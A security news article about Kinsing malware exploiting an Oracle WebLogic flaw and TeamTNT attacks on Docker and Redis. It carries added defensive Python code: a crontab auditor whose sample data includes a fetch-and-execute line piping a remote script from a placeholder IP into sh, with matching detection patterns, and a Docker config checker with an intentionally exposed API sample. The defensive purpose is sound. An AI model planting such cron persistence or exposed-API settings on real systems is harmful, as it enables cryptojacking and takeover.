Malicious actors such as Kinsing leverage both recently disclosed and older security flaws in Oracle WebLogic Server to distribute cryptocurrency mining malware.
The operators behind the Kinsing malware have a history of scanning for vulnerable servers to co-opt into their botnet, including exposed Redis and SaltStack instances and servers affected by Log4Shell, Spring4Shell, and the Atlassian Confluence flaw (CVE-2022-26134).
Kinsing actors have also run campaigns against container environments, abusing misconfigured Docker daemon API ports to launch a cryptominer and then spread the malware to other containers and hosts.
In the latest wave of attacks, the actors weaponize CVE-2020-14882 (CVSS score: 9.8), a two-year-old remote code execution (RCE) bug, against unpatched servers to take control of them and drop malicious payloads.
It is worth noting that this vulnerability has been exploited in the past by multiple botnets to distribute a Monero miner and the Tsunami backdoor to infected Linux systems.
Successful exploitation is followed by the deployment of a shell script that performs a series of actions: removing /var/log/syslog, disabling Alibaba and Tencent security features and cloud service agents, and killing competing miner processes.
The shell script then downloads the Kinsing malware from a remote server, while also taking steps to ensure persistence by means of a cron job.
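The attack chain above ends with a cron entry that re-fetches the payload, so a cheap defensive check is to audit crontabs for the shapes that infection typically leaves behind. The following is an added example, not code from the article or from either vendor; the crontab content is constructed, the IP address is a documentation-range placeholder, and the indicator patterns are heuristics chosen for this illustration rather than any published detection rule.

```python
import re
from typing import Dict, List

# Constructed sample crontab (not captured from a real host). Lines 2 and 3
# are benign; line 4 fetches and pipes a remote script into sh every minute;
# line 5 runs a binary out of /tmp at boot.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * root /usr/local/bin/backup.sh
* * * * * (curl -fsSL http://203.0.113.10/k.sh || wget -q -O- http://203.0.113.10/k.sh) | sh > /dev/null 2>&1
@reboot /tmp/.x/miner
"""

# Heuristic indicators, each paired with a label so a finding is explainable.
# "output-discarded" is weak on its own and only meaningful alongside others.
INDICATORS = [
    ("fetch-and-execute", re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b")),
    ("runs-from-temp-dir", re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/\S+")),
    ("every-minute", re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s")),
    ("output-discarded", re.compile(r">\s*/dev/null\s+2>&1")),
]


def audit_crontab(text: str) -> List[Dict[str, object]]:
    """Return one finding per non-comment crontab line that matches any indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        hits = [name for name, pat in INDICATORS if pat.search(stripped)]
        if hits:
            findings.append({"line": lineno, "indicators": hits, "entry": stripped})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {', '.join(f['indicators'])}\n    {f['entry']}")
```

In practice the function would be fed the output of `crontab -l` for every user plus the contents of /etc/crontab and /etc/cron.d, and its findings correlated with other signs the article mentions, such as a truncated /var/log/syslog or stopped cloud security agents.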
“Successful exploitation of this vulnerability could lead to an RCE that would allow an attacker to perform a number of malicious activities on an affected system,” Trend Micro said. “This could extend to running malware […] the theft of critical data, or even complete control of a compromised machine.”
TeamTNT actors resurrected in Kangaroo Attack
The development comes as Aqua Security researchers identified three new attacks linked to another “active” cryptojacking group called TeamTNT, which voluntarily shut down in November 2021.
“TeamTNT is deploying a vanilla container image, alpine, using a command line that scans for a misconfigured Docker Daemon and downloads a shell script (k.sh) from the C2 server,” Aqua Security researcher Assaf Morag said.
What’s notable about the attack chain is that it appears to be designed to break SECP256K1 encryption; if this succeeds, the actor may be able to compute the keys for arbitrary cryptocurrency wallets. In other words, the idea is to use the targets’ high, illegally obtained computing power to run an ECDLP solver and obtain the key.
Two other attacks mounted by the group target exposed Redis servers and improperly configured Docker APIs to deploy coin miners and Tsunami binaries.
TeamTNT’s targeting of Docker REST APIs has been well documented over the past year. But an operational security failure exposed credentials associated with two attacker-controlled DockerHub accounts discovered by Trend Micro.
The accounts alpineos and sandeep078 were allegedly used to distribute various malicious payloads, including rootkits, Kubernetes exploit kits, credential stealers, the XMRig Monero miner, and even the Kinsing malware.
“Account alpineos was used for three exploit attempts on our honeypot from mid-September to early October 2021, tracking the IP address of the deployment to a location in Germany,” Trend Micro’s Nitesh Surana said.
“The attacker was logged into an account on the DockerHub registry and probably forgot to log out,” or “the threat actor logged into the DockerHub account using alpineos credentials.”
Trend Micro said the malicious alpineos image was downloaded more than 150,000 times, adding that it notified Docker about these accounts.
It also recommends configuring exposed REST APIs with TLS to mitigate adversary-in-the-middle (AiTM) attacks, and using credential stores and credential helpers to hold user credentials instead of the plaintext client config.
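The two recommendations above map onto two Docker configuration files: `daemon.json` controls how the engine’s REST API is exposed, and the client’s `config.json` controls where registry credentials are kept. The following is an added example, not code from the article, Trend Micro, or the Docker project; it shows a weak configuration beside its hardened counterpart and a small audit function for each. The certificate paths and the `pass` credential helper are illustrative choices, and the inline credential is a constructed `user:pass` value.

```python
import json
from typing import List

# Constructed insecure daemon.json: the API is bound to every interface over
# plain TCP, with no TLS and no client-certificate verification. Anyone who
# can reach port 2375 can start containers, which is exactly the
# misconfiguration both Kinsing and TeamTNT scan for.
INSECURE_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Constructed hardened daemon.json: TLS on the conventional port 2376 with
# tlsverify, so the daemon rejects clients that do not present a certificate
# signed by the CA in tlscacert. Certificate paths are illustrative.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tls": True,
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Constructed client config.json files. The insecure one keeps a base64
# "user:pass" token inline (what a forgotten `docker login` leaves behind);
# the hardened one delegates storage to a credential helper.
INSECURE_CLIENT_CONFIG = json.dumps({
    "auths": {"https://index.docker.io/v1/": {"auth": "dXNlcjpwYXNz"}},
})
HARDENED_CLIENT_CONFIG = json.dumps({
    "credsStore": "pass",
    "auths": {"https://index.docker.io/v1/": {}},
})


def audit_daemon_config(raw: str) -> List[str]:
    """Flag TCP API listeners that are not protected by client-verified TLS."""
    cfg = json.loads(raw)
    problems = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if tcp_hosts:
        if not cfg.get("tlsverify"):
            problems.append("tcp listener without tlsverify: " + ", ".join(tcp_hosts))
        else:
            for key in ("tlscacert", "tlscert", "tlskey"):
                if key not in cfg:
                    problems.append(f"tlsverify set but {key} missing")
    return problems


def audit_client_config(raw: str) -> List[str]:
    """Flag registry credentials stored inline rather than in a helper."""
    cfg = json.loads(raw)
    problems = []
    if "credsStore" not in cfg and "credHelpers" not in cfg:
        problems.append("no credential store or helper configured")
    for registry, entry in cfg.get("auths", {}).items():
        if entry.get("auth"):
            problems.append(f"base64 credentials stored inline for {registry}")
    return problems


if __name__ == "__main__":
    for label, raw in (("insecure daemon", INSECURE_DAEMON_JSON),
                       ("hardened daemon", HARDENED_DAEMON_JSON)):
        print(label, audit_daemon_config(raw) or "ok")
    for label, raw in (("insecure client", INSECURE_CLIENT_CONFIG),
                       ("hardened client", HARDENED_CLIENT_CONFIG)):
        print(label, audit_client_config(raw) or "ok")
```

One caveat when applying the hardened `daemon.json` on a systemd-managed host: the packaged unit file usually already passes `-H` on the `dockerd` command line, and the daemon refuses to start when `hosts` is set in both places, so the flag has to be dropped from the unit (or the setting kept in only one location).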